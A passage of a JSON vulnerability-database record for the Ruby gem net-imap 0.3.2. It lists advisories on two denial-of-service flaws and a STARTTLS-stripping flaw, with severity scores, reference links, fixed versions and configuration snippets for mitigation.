{"url":"http://public2.vulnerablecode.io/api/packages/130704?format=json","purl":"pkg:gem/net-imap@0.3.2","type":"gem","namespace":"","name":"net-imap","version":"0.3.2","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/355852?format=json","vulnerability_id":"VCID-1zvv-b8mk-fbd1","summary":"net-imap vulnerable to denial of service via high iteration count for `SCRAM-*` authentication","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42256.json","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42256.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42256","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15639","published_at":"2026-05-11T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15753","published_at":"2026-05-14T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1568","published_at":"2026-05-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42256"},{"reference_url":"https://github.com/ruby/net-imap","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap"},{"reference_url":"https://github.com/ruby/net-imap/commit/158d0b505074397cdb5ceb58935e42dd2bcfa612","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:04:26Z/"}],"url":"https://github.com/ruby/net-imap/commit/158d0b505074397cdb5ceb58935e42dd2bcfa612"},{"reference_url":"https://github.com/ruby/net-imap/commit/808001bc45c06f7297a7e96d341279e041a7f7f4","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:04:26Z/"}],"url":"https://github.com/ruby/net-imap/commit/808001bc45c06f7297a7e96d341279e041a7f7f4"},{"reference_url":"https://github.com/ruby/net-imap/commit/99f59eab6064955a23debd95410263ad144df758","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:04:26Z/"}],"url":"https://github.com/ruby/net-imap/commit/99f59eab6064955a23debd95410263ad144df758"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.4.24","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:04:26Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.4.24"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.5.14","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:04:26Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.5.14"},{"reference_url":"https://github.com/ruby/net-imap/releases/tag/v0.6.4","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:04:26Z/"}],"url":"https://github.com/ruby/net-imap/releases/tag/v0.6.4"},{"reference_url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2026-42256.yml","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2026-42256.yml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42256","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42256"},{"reference_url":"https://www.rfc-editor.org/rfc/rfc7804.html#page-15","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.rfc-editor.org/rfc/rfc7804.html#page-15"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2468500","reference_id":"2468500","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2468500"},{"reference_url":"https://github.com/advisories/GHSA-87pf-fpwv-p7m7","reference_id":"GHSA-87pf-fpwv-p7m7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-87pf-fpwv-p7m7"},{"reference_url":"https://github.com/ruby/net-imap/security/advisories/GHSA-87pf-fpwv-p7m7","reference_id":"GHSA-87pf-fpwv-p7m7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:04:26Z/"}],"url":"https://github.com/ruby/net-imap/security/advisories/GHSA-87pf-fpwv-p7m7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1089665?format=json","purl":"pkg:gem/net-imap@0.4.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.24"},{"url":"http://public2.vulnerablecode.io/api/packages/1089660?format=json","purl":"pkg:gem/net-imap@0.5.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.14"},{"url":"http://public2.vulnerablecode.io/api/packages/1089663?format=json","purl":"pkg:gem/net-imap@0.6.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.6.4"}],"aliases":["CVE-2026-42256","GHSA-87pf-fpwv-p7m7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1zvv-b8mk-fbd1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/25420?format=json","vulnerability_id":"VCID-5zsx-353j-8kax","summary":"net-imap rubygem vulnerable to possible DoS by memory exhaustion\n### Summary\n\nThere is a possibility for denial of service by memory exhaustion when `net-imap` reads server responses.  At any time while the client is connected, a malicious server can send can send a \"literal\" byte count, which is automatically read by the client's receiver thread.  The response reader immediately allocates memory for the number of bytes indicated by the server response.\n\nThis should not be an issue when securely connecting to trusted IMAP servers that are well-behaved.  It can affect insecure connections and buggy, untrusted, or compromised servers (for example, connecting to a user supplied hostname).\n\n### Details\n\nThe IMAP protocol allows \"literal\" strings to be sent in responses, prefixed with their size in curly braces (e.g. `{1234567890}\\r\\n`).  When `Net::IMAP` receives a response containing a literal string, it calls `IO#read` with that size.  When called with a size, `IO#read` immediately allocates memory to buffer the entire string before processing continues.  The server does not need to send any more data.  There is no limit on the size of literals that will be accepted.\n\n### Fix\n#### Upgrade\nUsers should upgrade to `net-imap` 0.5.7 or later.  A configurable `max_response_size` limit has been added to `Net::IMAP`'s response reader.  The `max_response_size` limit has also been backported to `net-imap` 0.2.5, 0.3.9, and 0.4.20.\n\nTo set a global value for `max_response_size`, users must upgrade to `net-imap` ~> 0.4.20, or > 0.5.7.\n\n#### Configuration\n\nTo avoid backward compatibility issues for secure connections to trusted well-behaved servers, the default `max_response_size` for `net-imap` 0.5.7 is _very high_ (512MiB), and the default `max_response_size` for `net-imap` ~> 0.4.20, ~> 0.3.9, and 0.2.5 is `nil` (unlimited).\n\nWhen connecting to untrusted servers or using insecure connections, a much lower `max_response_size` should be used.\n```ruby\n# Set the global max_response_size (only ~> v0.4.20, > 0.5.7)\nNet::IMAP.config.max_response_size = 256 << 10 # 256 KiB\n\n# Set when creating the connection\nimap = Net::IMAP.new(hostname, ssl: true,\n                     max_response_size: 16 << 10) # 16 KiB\n\n# Set after creating the connection\nimap.max_response_size = 256 << 20 # 256 KiB\n# flush currently waiting read, to ensure the new setting is loaded\nimap.noop\n```\n\n_**Please Note:**_ `max_response_size` only limits the size _per response_.  It does not prevent a flood of individual responses and it does not limit how many unhandled responses may be stored on the responses hash.  Users are responsible for adding response handlers to prune excessive unhandled responses.\n\n#### Compatibility with lower `max_response_size`\n\nA lower `max_response_size` may cause a few commands which legitimately return very large responses to raise an exception and close the connection.  The `max_response_size` could be temporarily set to a higher value, but paginated or limited versions of commands should be used whenever possible.  For example, to fetch message bodies:\n\n```ruby\nimap.max_response_size = 256 << 20 # 256 KiB\nimap.noop # flush currently waiting read\n\n# fetch a message in 252KiB chunks\nsize = imap.uid_fetch(uid, \"RFC822.SIZE\").first.rfc822_size\nlimit = 252 << 10\nmessage = ((0..size) % limit).each_with_object(\"\") {|offset, str|\n  str << imap.uid_fetch(uid, \"BODY.PEEK[]<#{offset}.#{limit}>\").first.message(offset:)\n}\n\nimap.max_response_size = 16 << 20 # 16 KiB\nimap.noop # flush currently waiting read\n```\n\n### References\n\n* PR to introduce max_response_size: https://github.com/ruby/net-imap/pull/444\n  * Specific commit: [0ae8576c1 - lib/net/imap/response_reader.rb](https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462)\n* Backport to 0.4: https://github.com/ruby/net-imap/pull/445\n* Backport to 0.3: https://github.com/ruby/net-imap/pull/446\n* Backport to 0.2: https://github.com/ruby/net-imap/pull/447","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-43857.json","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-43857.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-43857","reference_id":"","reference_type":"","scores":[{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67305","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67242","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67218","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67126","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67166","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67185","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67171","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67137","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67168","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67182","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67102","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67163","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.6715","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67101","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67246","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67208","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67198","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00528","scoring_system":"epss","scoring_elements":"0.67186","published_at":"2026-04-24T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-43857"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"3.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/ruby/net-imap","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap"},{"reference_url":"https://github.com/ruby/net-imap/pull/442","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-28T17:59:30Z/"}],"url":"https://github.com/ruby/net-imap/pull/442"},{"reference_url":"https://github.com/ruby/net-imap/pull/444","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap/pull/444"},{"reference_url":"https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-28T17:59:30Z/"}],"url":"https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462"},{"reference_url":"https://github.com/ruby/net-imap/pull/445","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-28T17:59:30Z/"}],"url":"https://github.com/ruby/net-imap/pull/445"},{"reference_url":"https://github.com/ruby/net-imap/pull/446","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-28T17:59:30Z/"}],"url":"https://github.com/ruby/net-imap/pull/446"},{"reference_url":"https://github.com/ruby/net-imap/pull/447","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-28T17:59:30Z/"}],"url":"https://github.com/ruby/net-imap/pull/447"},{"reference_url":"https://github.com/ruby/net-imap/security/advisories/GHSA-j3g3-5qv5-52mj","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-28T17:59:30Z/"}],"url":"https://github.com/ruby/net-imap/security/advisories/GHSA-j3g3-5qv5-52mj"},{"reference_url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2025-43857.yml","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2025-43857.yml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-43857","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-43857"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1104486","reference_id":"1104486","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1104486"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2362749","reference_id":"2362749","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2362749"},{"reference_url":"https://github.com/advisories/GHSA-j3g3-5qv5-52mj","reference_id":"GHSA-j3g3-5qv5-52mj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j3g3-5qv5-52mj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/68653?format=json","purl":"pkg:gem/net-imap@0.3.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-5zsx-353j-8kax"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.9"},{"url":"http://public2.vulnerablecode.io/api/packages/68652?format=json","purl":"pkg:gem/net-imap@0.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-5zsx-353j-8kax"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.20"},{"url":"http://public2.vulnerablecode.io/api/packages/68651?format=json","purl":"pkg:gem/net-imap@0.5.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1zvv-b8mk-fbd1"},{"vulnerability":"VCID-5zsx-353j-8kax"},{"vulnerability":"VCID-gsp4-pq1s-jkbw"},{"vulnerability":"VCID-jwy5-uf6y-j7ae"},{"vulnerability":"VCID-rfhh-yjxe-3fds"},{"vulnerability":"VCID-unx7-72n1-2bd4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.7"}],"aliases":["CVE-2025-43857","GHSA-j3g3-5qv5-52mj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5zsx-353j-8kax"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/355850?format=json","vulnerability_id":"VCID-gsp4-pq1s-jkbw","summary":"net-imap vulnerable to STARTTLS stripping via invalid response timing","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42246","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15509","published_at":"2026-05-11T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15626","published_at":"2026-05-14T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15549","published_at":"2026-05-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42246"},{"reference_url":"https://github.com/ruby/net-imap","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/net-imap"},{"reference_url":"https://github.com/ruby/net-imap/commit/0ede4c40b1523dfeaf95777b2678e54cc0fd9618","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-12T02:29:05Z/"}],"url":"https://github.com/ruby/net-imap/commit/0ede4c40b1523dfeaf95777b2678e54cc0fd9618"},{"reference_url":"https://github.com/ruby/net-imap/commit/24a4e770b43230286a05aa2a9746cdbb3eb8485e","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-12T02:29:05Z/"}],"url":"https://github.com/ruby/net-imap/commit/24a4e770b43230286a05aa2a9746cdbb3eb8485e"},{"reference_url":"https://github.com/ruby/net-imap/commit/97e2488fb5401a1783bddd959dde007d9fbce42c","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-12T02:29:05Z/"}],"url":"https://github.com/ruby/net-imap/commit/97e2488fb5401a1783bddd959d